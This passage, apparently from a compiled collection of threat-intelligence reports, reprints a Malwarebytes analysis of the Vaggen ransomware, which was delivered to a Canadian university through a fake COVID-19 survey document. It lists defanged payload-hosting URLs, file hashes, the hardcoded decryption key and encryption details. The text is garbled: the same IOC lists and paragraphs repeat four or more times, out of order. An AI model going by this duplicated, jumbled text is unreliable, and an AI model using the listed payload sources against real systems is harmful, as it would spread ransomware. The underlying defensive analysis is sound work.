who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2694 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2695 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2696 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2697 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2698 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2699 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2700 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2701 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2702 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2703 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2704 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2705 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2706 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2707 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2708 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2709 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2710 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2711 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2712 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2713 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2714 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2715 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2716 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2717 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2718 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2719 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2720 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2721 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2722 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2723 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2724 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2725 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/